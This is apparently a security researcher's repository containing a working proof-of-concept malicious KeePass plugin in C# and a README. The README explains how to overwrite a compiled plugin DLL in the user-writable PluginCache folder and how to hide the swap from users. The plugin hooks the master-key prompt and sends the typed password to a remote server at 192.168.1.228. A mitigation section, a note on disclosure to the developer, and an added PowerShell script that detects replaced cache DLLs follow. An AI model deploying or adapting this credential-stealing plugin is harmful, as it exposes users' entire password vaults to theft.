```
├── MaliciousPlugin.cs
├── README.md
└── images
    ├── Compiled_Plugin.png
    ├── Exfiltrated_Pass.png
    └── Plugin.png
```

/MaliciousPlugin.cs:

```csharp
using System.Net;
using System.Text;

using KeePass.Plugins;
using KeePass.Forms;
using KeePass.UI;

namespace KeePassHttp
{
    public sealed class KeePassHttpExt : Plugin
    {
        public override bool Initialize(IPluginHost host)
        {
            // when a window is added in KeePass we want to see if it is the key prompt
            GlobalWindowManager.WindowAdded += WindowAddedHandler;
            return true;
        }

        private void WindowAddedHandler(object sender, GwmWindowEventArgs e)
        {
            // we are only interested in getting the database key
            if (e.Form is KeyPromptForm)
            {
                // when the form is closing, capture the event using a delegate
                e.Form.FormClosing += delegate
                {
                    // find the password text box and cast it as a SecureTextBoxEx
                    var m_tbPassword = e.Form.Controls.Find("m_tbPassword", true)[0] as SecureTextBoxEx;
                    if (m_tbPassword != null)
                    {
                        // the web server we host may return a 404, but we don't care
                        try
                        {
                            string dontCare = new WebClient().DownloadString("http://192.168.1.228/capture.php?keepass_password=" + Encoding.UTF8.GetString(m_tbPassword.TextEx.ReadUtf8()));
                        }
                        catch { }
                    }
                };

                // we can remove the handler now (hopefully we have the database key)
                e.Form.FormClosed += delegate
                {
                    GlobalWindowManager.WindowAdded -= WindowAddedHandler;
                };
            }
        }
    }
}
```

/README.md:

# Malicious KeePass Plugin
I have used the [KeePassHttp Plugin](https://github.com/pfn/keepasshttp) to demonstrate this PoC.
I used the [KeePassHttp.plgx](https://github.com/pfn/keepasshttp/blob/master/KeePassHttp.plgx) file. It could quite easily be any other plugin.

I tested the PoC against KeePass Password Safe 2.49 (64-bit). This PoC is in no way a bad reflection of the KeePass application, but it does demonstrate how the master key can be exfiltrated from a default installation of KeePass.

**Note:** This attack vector can only be used against pre-compiled plugins placed in the plugins cache.

## The Plugin
The plugin itself isn't anything particularly complex, but the way in which KeePass compiles plugins and caches the compiled DLL is what interested me.

If you add a `.plgx` file to the KeePass Plugins directory, KeePass will compile it the next time it is started. You need elevated privileges to write to the Plugins directory, which means you **cannot** just drop malicious plugins there via a phishing attack or some other malware. Whilst this might not be a concern for a home user (they are probably logged in as an administrator anyway), it might be a concern in a corporate environment where the IT team have installed KeePass for non-privileged users. The `KeePassHttp.plgx` plugin is shown below:

![The Plugin Directory](https://github.com/plackyhacker/Malicious-KeePass-Plugin/blob/main/images/Plugin.png?raw=true)

You could try to trick users into dropping malicious plugins here, but there is an easier way.

## The Compiled Plugin
The compiled plugin is written to the user's `AppData` folder, which is **writable** without a privileged account by default.
It isn't inconceivable that a phishing attack or some other malware could drop a malicious plugin into this directory to try and elevate privileges, or gain access to a user's sensitive data:

![Compiled Plugin](https://github.com/plackyhacker/Malicious-KeePass-Plugin/blob/main/images/Compiled_Plugin.png?raw=true)

All we need to do is compile the malicious plugin as a DLL and drop it over the top of the compiled `KeePassHttp.dll` file, ensuring the DLL is written and compiled according to the [plugin requirements](https://keepass.info/help/v2_dev/plg_index.html).

## Exfiltration
The next time the user opens KeePass, the malicious plugin exfiltrates the master key:

![Master Key](https://github.com/plackyhacker/Malicious-KeePass-Plugin/blob/main/images/Exfiltrated_Pass.png?raw=true)

## Alleviate User Suspicions
It is very likely that a user will miss their favourite plugin when you have overwritten it with your own. You could download the source code for the target plugin (if it is available, or even decompile it, as it is a .NET assembly), then amend it to suit your own needs while ensuring the existing functionality is not altered.

# Mitigation
I contacted the developer of KeePass, **Dominik Reichl**, before posting this; I wanted to make sure it wasn't an unknown attack vector. However, this is an instance where the functionality of a program might outweigh the risk: 'This cache highly improves the startup performance of KeePass'. Known security 'issues' in KeePass are posted [in the KeePass knowledge base](https://keepass.info/help/kb/sec_issues.html#cfgw).

The best mitigation is to be aware of how KeePass plugins work. If you have any concerns about this type of attack vector then the `PluginCache` folder should be avoided; instead, place pre-compiled DLL plugins in the protected `C:\Program Files\KeePass Password Safe 2\Plugins` folder.
A non-privileged user cannot overwrite these by default.
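As an added defender-side check (this script is not part of the repository or of KeePass), the following PowerShell inventories the two plugin locations discussed above, probes whether the current non-privileged user can write to each, and flags a compiled DLL in the cache whose SHA-256 has changed since the saved baseline, which is exactly what overwriting `KeePassHttp.dll` produces. The default paths and the baseline file location are assumptions; run it as the ordinary user, not elevated.

```powershell
# Added example, not part of this repository: inventory both KeePass plugin locations, probe
# whether the current (non-admin) user can write to each, and flag a compiled DLL in the
# user-writable cache whose SHA-256 changed since the saved baseline. Assumed default paths:
#   %ProgramFiles%\KeePass Password Safe 2\Plugins - install-time plugin folder (protected)
#   %LOCALAPPDATA%\KeePass\PluginCache             - per-user cache of compiled .plgx plugins
param([switch]$UpdateBaseline)   # re-baseline only after a change has been verified as legitimate
$ProtectedPlugins = Join-Path $env:ProgramFiles 'KeePass Password Safe 2\Plugins'
$PluginCache      = Join-Path $env:LOCALAPPDATA 'KeePass\PluginCache'
$BaselineFile     = Join-Path $env:LOCALAPPDATA 'KeePass\plugin-baseline.json'   # assumed location

function Test-UserWritable {
    param([string]$Path)
    # Probe with a throw-away file: this reflects the effective ACL for the current token.
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $probe = Join-Path $Path ('probe-' + [guid]::NewGuid().ToString('N'))
    try { [IO.File]::WriteAllText($probe, ''); Remove-Item -LiteralPath $probe -Force; $true }
    catch { $false }
}

function Get-PluginInventory {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return @() }
    Get-ChildItem -LiteralPath $Path -Recurse -Filter *.dll | ForEach-Object {
        [pscustomobject]@{
            Path      = $_.FullName
            Sha256    = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
            LastWrite = $_.LastWriteTimeUtc
            # cache DLLs are compiled locally by KeePass, so 'NotSigned' is normal; the hash comparison is the real check
            Signature = (Get-AuthenticodeSignature -LiteralPath $_.FullName).Status
        }
    }
}

"Protected Plugins folder writable by current user: $(Test-UserWritable $ProtectedPlugins)"  # expect False
"PluginCache folder writable by current user:       $(Test-UserWritable $PluginCache)"       # expect True
$current = @(Get-PluginInventory $PluginCache)

if (Test-Path -LiteralPath $BaselineFile) {
    $baseline = @(Get-Content -LiteralPath $BaselineFile -Raw | ConvertFrom-Json)
    foreach ($dll in $current) {
        $old = $baseline | Where-Object { $_.Path -eq $dll.Path }
        if ($null -eq $old)                  { Write-Warning "New cache DLL: $($dll.Path)" }
        elseif ($old.Sha256 -ne $dll.Sha256) { Write-Warning "Cache DLL replaced: $($dll.Path) (was $($old.Sha256))" }
    }
}
if ($UpdateBaseline -or -not (Test-Path -LiteralPath $BaselineFile)) {
    ConvertTo-Json -InputObject $current -Depth 3 | Set-Content -LiteralPath $BaselineFile
    "Baseline written to $BaselineFile"
}
```

The first run only records the baseline; later runs warn on any new or replaced cache DLL, and a warning is expected after you deliberately update a `.plgx`, in which case re-run with `-UpdateBaseline` once the change is confirmed.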